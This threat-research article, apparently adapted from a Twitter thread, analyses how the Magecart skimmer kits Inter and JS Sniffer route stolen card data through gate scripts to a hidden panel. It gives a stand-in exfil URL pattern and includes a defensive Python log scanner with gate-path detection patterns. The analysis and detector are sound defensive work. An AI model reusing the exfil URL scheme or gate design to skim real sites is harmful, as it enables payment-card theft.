Digital skimmers use a variety of infrastructure setups to hide the real servers. The details vary by the script being used, but in general you will see three different hosts involved:
- Host 1: Skimmer Loader
- Host 2: Exfil burner domain / gate
- Host 3: Magecart Panel / c2
Hosts 1 and 2 are sometimes the same machine, but the goal is to keep the third host away from prying eyes. The idea is to hide the important part, the Panel, behind a layer that can't easily be pierced. The code for these gates is rather simple, but let's take a look at two examples.
The first one is Inter. The host where Inter actually lives is entered on line 3 (the Inter gate route is simply /gate or /gate/proxy), and this file is placed on a burner domain or, commonly, on some compromised system.
Let's say the exfil server was http://burner.example.com. The JavaScript skimmer base64 encodes your payment info, builds a URL with it, and makes a GET request. The GET request is frequently disguised as an image, but the basic URL format is http://burner.example.com/gate.php?hash=<base64>. You can see how Inter takes that information, appends the victim's IP and User-Agent, and uses file_get_contents to pass it along to the Panel/C2, which stays hidden from prying eyes because this network call is server to server.
Inter has two routes set up. One is /gate, which only concerns itself with the base64 encoded payment info. The other is /gate/proxy, which also parses out the IP address and User-Agent. Those routes pass the data to two functions, Incoming and Proxy. Both do similar things; Proxy just parses out the IP and UA arguments as well.
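As an added example (not code from the post, and not from Inter or JS Sniffer), here is a Python detector a defender can run over a web server's access log to spot requests of the shape described above: a GET whose query carries base64 that decodes to card-like data, regardless of the path the gate hides behind. It assumes the Apache/nginx combined log format, uses a Luhn check as the card-data heuristic, and runs on constructed sample lines embedded below.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit
# Assumes Apache/nginx "combined" format; only the client IP and request URL are needed.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<url>\S+) ')
PAN_RE = re.compile(r'(?<!\d)\d{13,19}(?!\d)')  # candidate card numbers in the decoded payload
# Gate paths named in the post (Inter: /gate, /gate/proxy; JS Sniffer: prokladka.php, gate.php).
GATE_PATH_RE = re.compile(r'/(gate(\.php|/proxy)?|prokladka\.php)$', re.I)

def luhn_ok(digits):
    """Luhn checksum, used to drop random digit runs that merely look like PANs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        n = int(ch) * 2 if i % 2 else int(ch)
        total += n - 9 if n > 9 else n
    return total % 10 == 0

def try_b64(value):
    """Decode value as standard or URL-safe base64 text; None if it is neither."""
    if len(value) < 16 or not re.fullmatch(r'[A-Za-z0-9+/_-]+=*', value):
        return None
    padded = value + "=" * (-len(value) % 4)
    for decode in (lambda s: base64.b64decode(s, validate=True), base64.urlsafe_b64decode):
        try:
            return decode(padded).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
    return None

def scan_access_log(lines):
    """Return one dict per request whose query carries base64 that decodes to a Luhn-valid PAN."""
    hits = []
    for m in filter(None, map(LOG_RE.match, lines)):
        parts = urlsplit(m.group("url"))
        for values in parse_qs(parts.query).values():  # check every parameter, not just "hash"
            for value in values:
                decoded = try_b64(value)
                if decoded and any(luhn_ok(pan) for pan in PAN_RE.findall(decoded)):
                    hits.append({"ip": m.group("ip"), "path": parts.path, "payload": decoded,
                                 "known_gate_path": bool(GATE_PATH_RE.search(parts.path))})
    return hits

# Constructed sample log (not real traffic); the second line has the gate.php?hash=<base64> shape.
_PAYLOAD = base64.b64encode(b"cc=4111111111111111&cvv=123&exp=12/24").decode()
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Aug/2019:12:00:01 +0000] "GET /search.php?q=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'203.0.113.5 - - [10/Aug/2019:12:00:02 +0000] "GET /gate.php?hash={_PAYLOAD} HTTP/1.1" 200 43 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Aug/2019:12:00:03 +0000] "GET /img/logo.png HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]
```

Because the check keys on the decoded payload rather than the path, it still fires when the gate is renamed to look like an image; the known_gate_path flag only adds confidence.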
Now let's look at how JS Sniffer handles things. It comes with a file named prokladka.php. Prokladka, or прокладка in Russian, means gasket (among other things). It has similar functionality to the gate.php file in Inter, except that it drops a cookie. On line 5 you specify the URL of the gate.php file, which should be on Host 3 as defined above. The unique thing it does is check for a cookie and drop one if it's not found. It then passes that cookie along as part of the final payload. The JS Sniffer gate.php file does a couple of things. It grabs the data that was passed along and then, depending on what $sniffer_type was set to, parses it differently.
Interestingly, Sochi (the author of Inter) is a better coder than Poter (the author of JS Sniffer). Inter is a decent MVC app; JS Sniffer is kind of just base-level PHP. Examples of JS Sniffer handling different $sniffer_type values:
And there you go. A look into $6k+ of illicit Magecart packages. It's really rather basic stuff, but it's the domain knowledge that was used to craft it that makes it somewhat valuable.
A modified version of this was originally posted on Twitter:
https://twitter.com/AffableKraut/status/1160432974778851328